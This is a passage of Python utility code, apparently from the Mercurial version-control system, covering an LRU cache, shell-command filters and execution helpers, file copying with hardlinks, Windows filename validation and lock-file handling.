995 995 def __exit__(self, exc_type, exc_val, exc_tb):
996 996 try:
997 997 if exc_type is None:
998 998 self.close()
999 999 finally:
1000 1000 self.release()
1001 1001
1002 1002 @contextlib.contextmanager
1003 1003 def acceptintervention(tr=None):
1004 1004 """A context manager that closes the transaction on InterventionRequired
1005 1005
1006 1006 If no transaction was provided, this simply runs the body and returns
1007 1007 """
1008 1008 if not tr:
1009 1009 yield
1010 1010 return
1011 1011 try:
1012 1012 yield
1013 1013 tr.close()
1014 1014 except error.InterventionRequired:
1015 1015 tr.close()
1016 1016 raise
1017 1017 finally:
1018 1018 tr.release()
1019 1019
1020 1020 @contextlib.contextmanager
1021 1021 def nullcontextmanager():
1022 1022 yield
1023 1023
1024 1024 class _lrucachenode(object):
1025 1025 """A node in a doubly linked list.
1026 1026
1027 1027 Holds a reference to nodes on either side as well as a key-value
1028 1028 pair for the dictionary entry.
1029 1029 """
1030 1030 __slots__ = (u'next', u'prev', u'key', u'value')
1031 1031
1032 1032 def __init__(self):
1033 1033 self.next = None
1034 1034 self.prev = None
1035 1035
1036 1036 self.key = _notset
1037 1037 self.value = None
1038 1038
1039 1039 def markempty(self):
1040 1040 """Mark the node as emptied."""
1041 1041 self.key = _notset
1042 1042
1043 1043 class lrucachedict(object):
1044 1044 """Dict that caches most recent accesses and sets.
1045 1045
1046 1046 The dict consists of an actual backing dict - indexed by original
1047 1047 key - and a doubly linked circular list defining the order of entries in
1048 1048 the cache.
1049 1049
1050 1050 The head node is the newest entry in the cache. If the cache is full,
1051 1051 we recycle head.prev and make it the new head. Cache accesses result in
1052 1052 the node being moved to before the existing head and being marked as the
1053 1053 new head node.
1054 1054 """
1055 1055 def __init__(self, max):
1056 1056 self._cache = {}
1057 1057
1058 1058 self._head = head = _lrucachenode()
1059 1059 head.prev = head
1060 1060 head.next = head
1061 1061 self._size = 1
1062 1062 self._capacity = max
1063 1063
1064 1064 def __len__(self):
1065 1065 return len(self._cache)
1066 1066
1067 1067 def __contains__(self, k):
1068 1068 return k in self._cache
1069 1069
1070 1070 def __iter__(self):
1071 1071 # We don't have to iterate in cache order, but why not.
1072 1072 n = self._head
1073 1073 for i in range(len(self._cache)):
1074 1074 yield n.key
1075 1075 n = n.next
1076 1076
1077 1077 def __getitem__(self, k):
1078 1078 node = self._cache[k]
1079 1079 self._movetohead(node)
1080 1080 return node.value
1081 1081
1082 1082 def __setitem__(self, k, v):
1083 1083 node = self._cache.get(k)
1084 1084 # Replace existing value and mark as newest.
1085 1085 if node is not None:
1086 1086 node.value = v
1087 1087 self._movetohead(node)
1088 1088 return
1089 1089
1090 1090 if self._size < self._capacity:
1091 1091 node = self._addcapacity()
1092 1092 else:
1093 1093 # Grab the last/oldest item.
1094 1094 node = self._head.prev
1095 1095
1096 1096 # At capacity. Kill the old entry.
1097 1097 if node.key is not _notset:
1098 1098 del self._cache[node.key]
1099 1099
1100 1100 node.key = k
1101 1101 node.value = v
1102 1102 self._cache[k] = node
1103 1103 # And mark it as newest entry. No need to adjust order since it
1104 1104 # is already self._head.prev.
1105 1105 self._head = node
1106 1106
1107 1107 def __delitem__(self, k):
1108 1108 node = self._cache.pop(k)
1109 1109 node.markempty()
1110 1110
1111 1111 # Temporarily mark as newest item before re-adjusting head to make
1112 1112 # this node the oldest item.
1113 1113 self._movetohead(node)
1114 1114 self._head = node.next
1115 1115
1116 1116 # Additional dict methods.
1117 1117
1118 1118 def get(self, k, default=None):
1119 1119 try:
1120 1120 return self._cache[k].value
1121 1121 except KeyError:
1122 1122 return default
1123 1123
1124 1124 def clear(self):
1125 1125 n = self._head
1126 1126 while n.key is not _notset:
1127 1127 n.markempty()
1128 1128 n = n.next
1129 1129
1130 1130 self._cache.clear()
1131 1131
1132 1132 def copy(self):
1133 1133 result = lrucachedict(self._capacity)
1134 1134 n = self._head.prev
1135 1135 # Iterate in oldest-to-newest order, so the copy has the right ordering
1136 1136 for i in range(len(self._cache)):
1137 1137 result[n.key] = n.value
1138 1138 n = n.prev
1139 1139 return result
1140 1140
1141 1141 def _movetohead(self, node):
1142 1142 """Mark a node as the newest, making it the new head.
1143 1143
1144 1144 When a node is accessed, it becomes the freshest entry in the LRU
1145 1145 list, which is denoted by self._head.
1146 1146
1147 1147 Visually, let's make ``N`` the new head node (* denotes head):
1148 1148
1149 1149 previous/oldest <-> head <-> next/next newest
1150 1150
1151 1151 ----<->--- A* ---<->-----
1152 1152 | |
1153 1153 E <-> D <-> N <-> C <-> B
1154 1154
1155 1155 To:
1156 1156
1157 1157 ----<->--- N* ---<->-----
1158 1158 | |
1159 1159 E <-> D <-> C <-> B <-> A
1160 1160
1161 1161 This requires the following moves:
1162 1162
1163 1163 C.next = D (node.prev.next = node.next)
1164 1164 D.prev = C (node.next.prev = node.prev)
1165 1165 E.next = N (head.prev.next = node)
1166 1166 N.prev = E (node.prev = head.prev)
1167 1167 N.next = A (node.next = head)
1168 1168 A.prev = N (head.prev = node)
1169 1169 """
1170 1170 head = self._head
1171 1171 # C.next = D
1172 1172 node.prev.next = node.next
1173 1173 # D.prev = C
1174 1174 node.next.prev = node.prev
1175 1175 # N.prev = E
1176 1176 node.prev = head.prev
1177 1177 # N.next = A
1178 1178 # It is tempting to do just "head" here, however if node is
1179 1179 # adjacent to head, this will do bad things.
1180 1180 node.next = head.prev.next
1181 1181 # E.next = N
1182 1182 node.next.prev = node
1183 1183 # A.prev = N
1184 1184 node.prev.next = node
1185 1185
1186 1186 self._head = node
1187 1187
1188 1188 def _addcapacity(self):
1189 1189 """Add a node to the circular linked list.
1190 1190
1191 1191 The new node is inserted before the head node.
1192 1192 """
1193 1193 head = self._head
1194 1194 node = _lrucachenode()
1195 1195 head.prev.next = node
1196 1196 node.prev = head.prev
1197 1197 node.next = head
1198 1198 head.prev = node
1199 1199 self._size += 1
1200 1200 return node
1201 1201
1202 1202 def lrucachefunc(func):
1203 1203 '''cache most recent results of function calls'''
1204 1204 cache = {}
1205 1205 order = collections.deque()
1206 1206 if func.__code__.co_argcount == 1:
1207 1207 def f(arg):
1208 1208 if arg not in cache:
1209 1209 if len(cache) > 20:
1210 1210 del cache[order.popleft()]
1211 1211 cache[arg] = func(arg)
1212 1212 else:
1213 1213 order.remove(arg)
1214 1214 order.append(arg)
1215 1215 return cache[arg]
1216 1216 else:
1217 1217 def f(*args):
1218 1218 if args not in cache:
1219 1219 if len(cache) > 20:
1220 1220 del cache[order.popleft()]
1221 1221 cache[args] = func(*args)
1222 1222 else:
1223 1223 order.remove(args)
1224 1224 order.append(args)
1225 1225 return cache[args]
1226 1226
1227 1227 return f
1228 1228
1229 1229 class propertycache(object):
1230 1230 def __init__(self, func):
1231 1231 self.func = func
1232 1232 self.name = func.__name__
1233 1233 def __get__(self, obj, type=None):
1234 1234 result = self.func(obj)
1235 1235 self.cachevalue(obj, result)
1236 1236 return result
1237 1237
1238 1238 def cachevalue(self, obj, value):
1239 1239 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1240 1240 obj.__dict__[self.name] = value
1241 1241
1242 1242 def clearcachedproperty(obj, prop):
1243 1243 '''clear a cached property value, if one has been set'''
1244 1244 if prop in obj.__dict__:
1245 1245 del obj.__dict__[prop]
1246 1246
1247 1247 def pipefilter(s, cmd):
1248 1248 '''filter string S through command CMD, returning its output'''
1249 1249 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1250 1250 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1251 1251 pout, perr = p.communicate(s)
1252 1252 return pout
1253 1253
1254 1254 def tempfilter(s, cmd):
1255 1255 '''filter string S through a pair of temporary files with CMD.
1256 1256 CMD is used as a template to create the real command to be run,
1257 1257 with the strings INFILE and OUTFILE replaced by the real names of
1258 1258 the temporary files generated.'''
1259 1259 inname, outname = None, None
1260 1260 try:
1261 1261 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1262 1262 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1263 1263 fp.write(s)
1264 1264 fp.close()
1265 1265 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1266 1266 os.close(outfd)
1267 1267 cmd = cmd.replace('INFILE', inname)
1268 1268 cmd = cmd.replace('OUTFILE', outname)
1269 1269 code = os.system(cmd)
1270 1270 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1271 1271 code = 0
1272 1272 if code:
1273 1273 raise Abort(_("command '%s' failed: %s") %
1274 1274 (cmd, explainexit(code)))
1275 1275 return readfile(outname)
1276 1276 finally:
1277 1277 try:
1278 1278 if inname:
1279 1279 os.unlink(inname)
1280 1280 except OSError:
1281 1281 pass
1282 1282 try:
1283 1283 if outname:
1284 1284 os.unlink(outname)
1285 1285 except OSError:
1286 1286 pass
1287 1287
1288 1288 filtertable = {
1289 1289 'tempfile:': tempfilter,
1290 1290 'pipe:': pipefilter,
1291 1291 }
1292 1292
1293 1293 def filter(s, cmd):
1294 1294 "filter a string through a command that transforms its input to its output"
1295 1295 for name, fn in filtertable.iteritems():
1296 1296 if cmd.startswith(name):
1297 1297 return fn(s, cmd[len(name):].lstrip())
1298 1298 return pipefilter(s, cmd)
1299 1299
1300 1300 def binary(s):
1301 1301 """return true if a string is binary data"""
1302 1302 return bool(s and '\0' in s)
1303 1303
1304 1304 def increasingchunks(source, min=1024, max=65536):
1305 1305 '''return no less than min bytes per chunk while data remains,
1306 1306 doubling min after each chunk until it reaches max'''
1307 1307 def log2(x):
1308 1308 if not x:
1309 1309 return 0
1310 1310 i = 0
1311 1311 while x:
1312 1312 x >>= 1
1313 1313 i += 1
1314 1314 return i - 1
1315 1315
1316 1316 buf = []
1317 1317 blen = 0
1318 1318 for chunk in source:
1319 1319 buf.append(chunk)
1320 1320 blen += len(chunk)
1321 1321 if blen >= min:
1322 1322 if min < max:
1323 1323 min = min << 1
1324 1324 nmin = 1 << log2(blen)
1325 1325 if nmin > min:
1326 1326 min = nmin
1327 1327 if min > max:
1328 1328 min = max
1329 1329 yield ''.join(buf)
1330 1330 blen = 0
1331 1331 buf = []
1332 1332 if buf:
1333 1333 yield ''.join(buf)
1334 1334
1335 1335 Abort = error.Abort
1336 1336
1337 1337 def always(fn):
1338 1338 return True
1339 1339
1340 1340 def never(fn):
1341 1341 return False
1342 1342
1343 1343 def nogc(func):
1344 1344 """disable garbage collector
1345 1345
1346 1346 Python's garbage collector triggers a GC each time a certain number of
1347 1347 container objects (the number being defined by gc.get_threshold()) are
1348 1348 allocated even when marked not to be tracked by the collector. Tracking has
1349 1349 no effect on when GCs are triggered, only on what objects the GC looks
1350 1350 into. As a workaround, disable GC while building complex (huge)
1351 1351 containers.
1352 1352
1353 1353 This garbage collector issue have been fixed in 2.7. But it still affect
1354 1354 CPython's performance.
1355 1355 """
1356 1356 def wrapper(*args, **kwargs):
1357 1357 gcenabled = gc.isenabled()
1358 1358 gc.disable()
1359 1359 try:
1360 1360 return func(*args, **kwargs)
1361 1361 finally:
1362 1362 if gcenabled:
1363 1363 gc.enable()
1364 1364 return wrapper
1365 1365
1366 1366 if pycompat.ispypy:
1367 1367 # PyPy runs slower with gc disabled
1368 1368 nogc = lambda x: x
1369 1369
1370 1370 def pathto(root, n1, n2):
1371 1371 '''return the relative path from one place to another.
1372 1372 root should use os.sep to separate directories
1373 1373 n1 should use os.sep to separate directories
1374 1374 n2 should use "/" to separate directories
1375 1375 returns an os.sep-separated path.
1376 1376
1377 1377 If n1 is a relative path, it's assumed it's
1378 1378 relative to root.
1379 1379 n2 should always be relative to root.
1380 1380 '''
1381 1381 if not n1:
1382 1382 return localpath(n2)
1383 1383 if os.path.isabs(n1):
1384 1384 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1385 1385 return os.path.join(root, localpath(n2))
1386 1386 n2 = '/'.join((pconvert(root), n2))
1387 1387 a, b = splitpath(n1), n2.split('/')
1388 1388 a.reverse()
1389 1389 b.reverse()
1390 1390 while a and b and a[-1] == b[-1]:
1391 1391 a.pop()
1392 1392 b.pop()
1393 1393 b.reverse()
1394 1394 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1395 1395
1396 1396 def mainfrozen():
1397 1397 """return True if we are a frozen executable.
1398 1398
1399 1399 The code supports py2exe (most common, Windows only) and tools/freeze
1400 1400 (portable, not much used).
1401 1401 """
1402 1402 return (safehasattr(sys, "frozen") or # new py2exe
1403 1403 safehasattr(sys, "importers") or # old py2exe
1404 1404 imp.is_frozen(u"__main__")) # tools/freeze
1405 1405
1406 1406 # the location of data files matching the source code
1407 1407 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1408 1408 # executable version (py2exe) doesn't support __file__
1409 1409 datapath = os.path.dirname(pycompat.sysexecutable)
1410 1410 else:
1411 1411 datapath = os.path.dirname(pycompat.fsencode(__file__))
1412 1412
1413 1413 i18n.setdatapath(datapath)
1414 1414
1415 1415 _hgexecutable = None
1416 1416
1417 1417 def hgexecutable():
1418 1418 """return location of the 'hg' executable.
1419 1419
1420 1420 Defaults to $HG or 'hg' in the search path.
1421 1421 """
1422 1422 if _hgexecutable is None:
1423 1423 hg = encoding.environ.get('HG')
1424 1424 mainmod = sys.modules[pycompat.sysstr('__main__')]
1425 1425 if hg:
1426 1426 _sethgexecutable(hg)
1427 1427 elif mainfrozen():
1428 1428 if getattr(sys, 'frozen', None) == 'macosx_app':
1429 1429 # Env variable set by py2app
1430 1430 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1431 1431 else:
1432 1432 _sethgexecutable(pycompat.sysexecutable)
1433 1433 elif (os.path.basename(
1434 1434 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1435 1435 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1436 1436 else:
1437 1437 exe = findexe('hg') or os.path.basename(sys.argv[0])
1438 1438 _sethgexecutable(exe)
1439 1439 return _hgexecutable
1440 1440
1441 1441 def _sethgexecutable(path):
1442 1442 """set location of the 'hg' executable"""
1443 1443 global _hgexecutable
1444 1444 _hgexecutable = path
1445 1445
1446 1446 def _isstdout(f):
1447 1447 fileno = getattr(f, 'fileno', None)
1448 1448 try:
1449 1449 return fileno and fileno() == sys.__stdout__.fileno()
1450 1450 except io.UnsupportedOperation:
1451 1451 return False # fileno() raised UnsupportedOperation
1452 1452
1453 1453 def shellenviron(environ=None):
1454 1454 """return environ with optional override, useful for shelling out"""
1455 1455 def py2shell(val):
1456 1456 'convert python object into string that is useful to shell'
1457 1457 if val is None or val is False:
1458 1458 return '0'
1459 1459 if val is True:
1460 1460 return '1'
1461 1461 return pycompat.bytestr(val)
1462 1462 env = dict(encoding.environ)
1463 1463 if environ:
1464 1464 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1465 1465 env['HG'] = hgexecutable()
1466 1466 return env
1467 1467
1468 1468 def system(cmd, environ=None, cwd=None, out=None):
1469 1469 '''enhanced shell command execution.
1470 1470 run with environment maybe modified, maybe in different dir.
1471 1471
1472 1472 if out is specified, it is assumed to be a file-like object that has a
1473 1473 write() method. stdout and stderr will be redirected to out.'''
1474 1474 try:
1475 1475 stdout.flush()
1476 1476 except Exception:
1477 1477 pass
1478 1478 cmd = quotecommand(cmd)
1479 1479 env = shellenviron(environ)
1480 1480 if out is None or _isstdout(out):
1481 1481 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1482 1482 env=env, cwd=cwd)
1483 1483 else:
1484 1484 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1485 1485 env=env, cwd=cwd, stdout=subprocess.PIPE,
1486 1486 stderr=subprocess.STDOUT)
1487 1487 for line in iter(proc.stdout.readline, ''):
1488 1488 out.write(line)
1489 1489 proc.wait()
1490 1490 rc = proc.returncode
1491 1491 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1492 1492 rc = 0
1493 1493 return rc
1494 1494
1495 1495 def checksignature(func):
1496 1496 '''wrap a function with code to check for calling errors'''
1497 1497 def check(*args, **kwargs):
1498 1498 try:
1499 1499 return func(*args, **kwargs)
1500 1500 except TypeError:
1501 1501 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1502 1502 raise error.SignatureError
1503 1503 raise
1504 1504
1505 1505 return check
1506 1506
1507 1507 # a whilelist of known filesystems where hardlink works reliably
1508 1508 _hardlinkfswhitelist = {
1509 1509 'btrfs',
1510 1510 'ext2',
1511 1511 'ext3',
1512 1512 'ext4',
1513 1513 'hfs',
1514 1514 'jfs',
1515 1515 'NTFS',
1516 1516 'reiserfs',
1517 1517 'tmpfs',
1518 1518 'ufs',
1519 1519 'xfs',
1520 1520 'zfs',
1521 1521 }
1522 1522
1523 1523 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1524 1524 '''copy a file, preserving mode and optionally other stat info like
1525 1525 atime/mtime
1526 1526
1527 1527 checkambig argument is used with filestat, and is useful only if
1528 1528 destination file is guarded by any lock (e.g. repo.lock or
1529 1529 repo.wlock).
1530 1530
1531 1531 copystat and checkambig should be exclusive.
1532 1532 '''
1533 1533 assert not (copystat and checkambig)
1534 1534 oldstat = None
1535 1535 if os.path.lexists(dest):
1536 1536 if checkambig:
1537 1537 oldstat = checkambig and filestat.frompath(dest)
1538 1538 unlink(dest)
1539 1539 if hardlink:
1540 1540 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1541 1541 # unless we are confident that dest is on a whitelisted filesystem.
1542 1542 try:
1543 1543 fstype = getfstype(os.path.dirname(dest))
1544 1544 except OSError:
1545 1545 fstype = None
1546 1546 if fstype not in _hardlinkfswhitelist:
1547 1547 hardlink = False
1548 1548 if hardlink:
1549 1549 try:
1550 1550 oslink(src, dest)
1551 1551 return
1552 1552 except (IOError, OSError):
1553 1553 pass # fall back to normal copy
1554 1554 if os.path.islink(src):
1555 1555 os.symlink(os.readlink(src), dest)
1556 1556 # copytime is ignored for symlinks, but in general copytime isn't needed
1557 1557 # for them anyway
1558 1558 else:
1559 1559 try:
1560 1560 shutil.copyfile(src, dest)
1561 1561 if copystat:
1562 1562 # copystat also copies mode
1563 1563 shutil.copystat(src, dest)
1564 1564 else:
1565 1565 shutil.copymode(src, dest)
1566 1566 if oldstat and oldstat.stat:
1567 1567 newstat = filestat.frompath(dest)
1568 1568 if newstat.isambig(oldstat):
1569 1569 # stat of copied file is ambiguous to original one
1570 1570 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1571 1571 os.utime(dest, (advanced, advanced))
1572 1572 except shutil.Error as inst:
1573 1573 raise Abort(str(inst))
1574 1574
1575 1575 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1576 1576 """Copy a directory tree using hardlinks if possible."""
1577 1577 num = 0
1578 1578
1579 1579 gettopic = lambda: hardlink and _('linking') or _('copying')
1580 1580
1581 1581 if os.path.isdir(src):
1582 1582 if hardlink is None:
1583 1583 hardlink = (os.stat(src).st_dev ==
1584 1584 os.stat(os.path.dirname(dst)).st_dev)
1585 1585 topic = gettopic()
1586 1586 os.mkdir(dst)
1587 1587 for name, kind in listdir(src):
1588 1588 srcname = os.path.join(src, name)
1589 1589 dstname = os.path.join(dst, name)
1590 1590 def nprog(t, pos):
1591 1591 if pos is not None:
1592 1592 return progress(t, pos + num)
1593 1593 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1594 1594 num += n
1595 1595 else:
1596 1596 if hardlink is None:
1597 1597 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1598 1598 os.stat(os.path.dirname(dst)).st_dev)
1599 1599 topic = gettopic()
1600 1600
1601 1601 if hardlink:
1602 1602 try:
1603 1603 oslink(src, dst)
1604 1604 except (IOError, OSError):
1605 1605 hardlink = False
1606 1606 shutil.copy(src, dst)
1607 1607 else:
1608 1608 shutil.copy(src, dst)
1609 1609 num += 1
1610 1610 progress(topic, num)
1611 1611 progress(topic, None)
1612 1612
1613 1613 return hardlink, num
1614 1614
1615 1615 _winreservednames = {
1616 1616 'con', 'prn', 'aux', 'nul',
1617 1617 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1618 1618 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1619 1619 }
1620 1620 _winreservedchars = ':*?"<>|'
1621 1621 def checkwinfilename(path):
1622 1622 r'''Check that the base-relative path is a valid filename on Windows.
1623 1623 Returns None if the path is ok, or a UI string describing the problem.
1624 1624
1625 1625 >>> checkwinfilename(b"just/a/normal/path")
1626 1626 >>> checkwinfilename(b"foo/bar/con.xml")
1627 1627 "filename contains 'con', which is reserved on Windows"
1628 1628 >>> checkwinfilename(b"foo/con.xml/bar")
1629 1629 "filename contains 'con', which is reserved on Windows"
1630 1630 >>> checkwinfilename(b"foo/bar/xml.con")
1631 1631 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1632 1632 "filename contains 'AUX', which is reserved on Windows"
1633 1633 >>> checkwinfilename(b"foo/bar/bla:.txt")
1634 1634 "filename contains ':', which is reserved on Windows"
1635 1635 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1636 1636 "filename contains '\\x07', which is invalid on Windows"
1637 1637 >>> checkwinfilename(b"foo/bar/bla ")
1638 1638 "filename ends with ' ', which is not allowed on Windows"
1639 1639 >>> checkwinfilename(b"../bar")
1640 1640 >>> checkwinfilename(b"foo\\")
1641 1641 "filename ends with '\\', which is invalid on Windows"
1642 1642 >>> checkwinfilename(b"foo\\/bar")
1643 1643 "directory name ends with '\\', which is invalid on Windows"
1644 1644 '''
1645 1645 if path.endswith('\\'):
1646 1646 return _("filename ends with '\\', which is invalid on Windows")
1647 1647 if '\\/' in path:
1648 1648 return _("directory name ends with '\\', which is invalid on Windows")
1649 1649 for n in path.replace('\\', '/').split('/'):
1650 1650 if not n:
1651 1651 continue
1652 1652 for c in _filenamebytestr(n):
1653 1653 if c in _winreservedchars:
1654 1654 return _("filename contains '%s', which is reserved "
1655 1655 "on Windows") % c
1656 1656 if ord(c) <= 31:
1657 1657 return _("filename contains '%s', which is invalid "
1658 1658 "on Windows") % escapestr(c)
1659 1659 base = n.split('.')[0]
1660 1660 if base and base.lower() in _winreservednames:
1661 1661 return _("filename contains '%s', which is reserved "
1662 1662 "on Windows") % base
1663 1663 t = n[-1:]
1664 1664 if t in '. ' and n not in '..':
1665 1665 return _("filename ends with '%s', which is not allowed "
1666 1666 "on Windows") % t
1667 1667
1668 1668 if pycompat.iswindows:
1669 1669 checkosfilename = checkwinfilename
1670 1670 timer = time.clock
1671 1671 else:
1672 1672 checkosfilename = platform.checkosfilename
1673 1673 timer = time.time
1674 1674
1675 1675 if safehasattr(time, "perf_counter"):
1676 1676 timer = time.perf_counter
1677 1677
1678 1678 def makelock(info, pathname):
1679 1679 """Create a lock file atomically if possible
1680 1680
1681 1681 This may leave a stale lock file if symlink isn't supported and signal
1682 1682 interrupt is enabled.
1683 1683 """
1684 1684 try:
1685 1685 return os.symlink(info, pathname)
1686 1686 except OSError as why:
1687 1687 if why.errno == errno.EEXIST:
1688 1688 raise
1689 1689 except AttributeError: # no symlink in os
1690 1690 pass
1691 1691
1692 1692 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1693 1693 os.write(ld, info)
1694 1694 os.close(ld)
1695 1695
1696 1696 def readlock(pathname):
1697 1697 try:
1698 1698 return os.readlink(pathname)
1699 1699 except OSError as why:
1700 1700 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1701 1701 raise
1702 1702 except AttributeError: # no symlink in os
1703 1703 pass
1704 1704 fp = posixfile(pathname)
1705 1705 r = fp.read()
1706 1706 fp.close()
1707 1707 return r
1708 1708
1709 1709 def fstat(fp):
1710 1710 '''stat file object that may not have fileno method.'''
1711 1711 try:
1712 1712 return os.fstat(fp.fileno())
1713 1713 except AttributeError:
1714 1714 return os.stat(fp.name)
1715 1715
1716 1716 # File system features
1717 1717
1718 1718 def fscasesensitive(path):
1719 1719 """
1720 1720 Return true if the given path is on a case-sensitive filesystem
1721 1721
1722 1722 Requires a path (like /foo/.hg) ending with a foldable final
1723 1723 directory component.
1724 1724 """
1725 1725 s1 = os.lstat(path)
1726 1726 d, b = os.path.split(path)
1727 1727 b2 = b.upper()
1728 1728 if b == b2:
1729 1729 b2 = b.lower()
1730 1730 if b == b2:
1731 1731 return True # no evidence against case sensitivity
1732 1732 p2 = os.path.join(d, b2)
1733 1733 try:
1734 1734 s2 = os.lstat(p2)
1735 1735 if s2 == s1:
1736 1736 return False
1737 1737 return True
1738 1738 except OSError:
1739 1739 return True
1740 1740
1741 1741 try:
1742 1742 import re2
1743 1743 _re2 = None
1744 1744 except ImportError:
1745 1745 _re2 = False
1746 1746
1747 1747 class _re(object):
1748 1748 def _checkre2(self):
1749 1749 global _re2
1750 1750 try:
1751 1751 # check if match works, see issue3964
1752 1752 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1753 1753 except ImportError:
1754 1754 _re2 = False
1755 1755
1756 1756 def compile(self, pat, flags=0):
1757 1757 '''Compile a regular expression, using re2 if possible
1758 1758
1759 1759 For best performance, use only re2-compatible regexp features. The
1760 1760 only flags from the re module that are re2-compatible are
1761 1761 IGNORECASE and MULTILINE.'''
1762 1762 if _re2 is None:
1763 1763 self._checkre2()
1764 1764 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1765 1765 if flags & remod.IGNORECASE:
1766 1766 pat = '(?i)' + pat
1767 1767 if flags & remod.MULTILINE:
1768 1768 pat = '(?m)' + pat
1769 1769 try:
1770 1770 return re2.compile(pat)
1771 1771 except re2.error:
1772 1772 pass
1773 1773 return remod.compile(pat, flags)
1774 1774
1775 1775 @propertycache
1776 1776 def escape(self):
1777 1777 '''Return the version of escape corresponding to self.compile.
1778 1778
1779 1779 This is imperfect because whether re2 or re is used for a particular
1780 1780 function depends on the flags, etc, but it's the best we can do.
1781 1781 '''
1782 1782 global _re2
1783 1783 if _re2 is None:
1784 1784 self._checkre2()
1785 1785 if _re2:
1786 1786 return re2.escape
1787 1787 else:
1788 1788 return remod.escape
1789 1789
1790 1790 re = _re()
1791 1791
1792 1792 _fspathcache = {}
1793 1793 def fspath(name, root):
1794 1794 '''Get name in the case stored in the filesystem
1795 1795
1796 1796 The name should be relative to root, and be normcase-ed for efficiency.
1797 1797
1798 1798 Note that this function is unnecessary, and should not be
1799 1799 called, for case-sensitive filesystems (simply because it's expensive).
1800 1800
1801 1801 The root should be normcase-ed, too.
1802 1802 '''
1803 1803 def _makefspathcacheentry(dir):
1804 1804 return dict((normcase(n), n) for n in os.listdir(dir))
1805 1805
1806 1806 seps = pycompat.ossep
1807 1807 if pycompat.osaltsep:
1808 1808 seps = seps + pycompat.osaltsep
1809 1809 # Protect backslashes. This gets silly very quickly.
1810 1810 seps.replace('\\','\\\\')
1811 1811 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1812 1812 dir = os.path.normpath(root)
1813 1813 result = []
1814 1814 for part, sep in pattern.findall(name):
1815 1815 if sep:
1816 1816 result.append(sep)
1817 1817 continue
1818 1818
1819 1819 if dir not in _fspathcache:
1820 1820 _fspathcache[dir] = _makefspathcacheentry(dir)
1821 1821 contents = _fspathcache[dir]
1822 1822
1823 1823 found = contents.get(part)
1824 1824 if not found:
1825 1825 # retry "once per directory" per "dirstate.walk" which
1826 1826 # may take place for each patches of "hg qpush", for example
1827 1827 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1828 1828 found = contents.get(part)
1829 1829
1830 1830 result.append(found or part)
1831 1831 dir = os.path.join(dir, part)
1832 1832
1833 1833 return ''.join(result)
1834 1834
1835 1835 def checknlink(testfile):
1836 1836 '''check whether hardlink count reporting works properly'''
1837 1837
1838 1838 # testfile may be open, so we need a separate file for checking to
1839 1839 # work around issue2543 (or testfile may get lost on Samba shares)
1840 1840 f1, f2, fp = None, None, None
1841 1841 try:
1842 1842 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1843 1843 suffix='1~', dir=os.path.dirname(testfile))
1844 1844 os.close(fd)
1845 1845 f2 = '%s2~' % f1[:-2]
1846 1846
1847 1847 oslink(f1, f2)
1848 1848 # nlinks() may behave differently for files on Windows shares if
1849 1849 # the file is open.
1850 1850 fp = posixfile(f2)
1851 1851 return nlinks(f2) > 1
1852 1852 except OSError:
1853 1853 return False
1854 1854 finally:
1855 1855 if fp is not None:
1856 1856 fp.close()
1857 1857 for f in (f1, f2):
1858 1858 try:
1859 1859 if f is not None:
1860 1860 os.unlink(f)
1861 1861 except OSError:
1862 1862 pass
1863 1863
1864 1864 def endswithsep(path):
1865 1865 '''Check path ends with os.sep or os.altsep.'''
1866 1866 return (path.endswith(pycompat.ossep)
1867 1867 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1868 1868
1869 1869 def splitpath(path):
1870 1870 '''Split path by os.sep.
1871 1871 Note that this function does not use os.altsep because this is
1872 1872 an alternative of simple "xxx.split(os.sep)".
1873 1873 It is recommended to use os.path.normpath() before using this
1874 1874 function if need.'''
1875 1875 return path.split(pycompat.ossep)
1876 1876
1877 1877 def gui():
1878 1878 '''Are we running in a GUI?'''
1879 1879 if pycompat.isdarwin:
1880 1880 if 'SSH_CONNECTION' in encoding.environ:
1881 1881 # handle SSH access to a box where the user is logged in
1882 1882 return False
1883 1883 elif getattr(osutil, 'isgui', None):
1884 1884 # check if a CoreGraphics session is available
1885 1885 return osutil.isgui()
1886 1886 else:
1887 1887 # pure build; use a safe default
1888 1888 return True
1889 1889 else:
1890 1890 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1891 1891
1892 1892 def mktempcopy(name, emptyok=False, createmode=None):
1893 1893 """Create a temporary file with the same contents from name
1894 1894
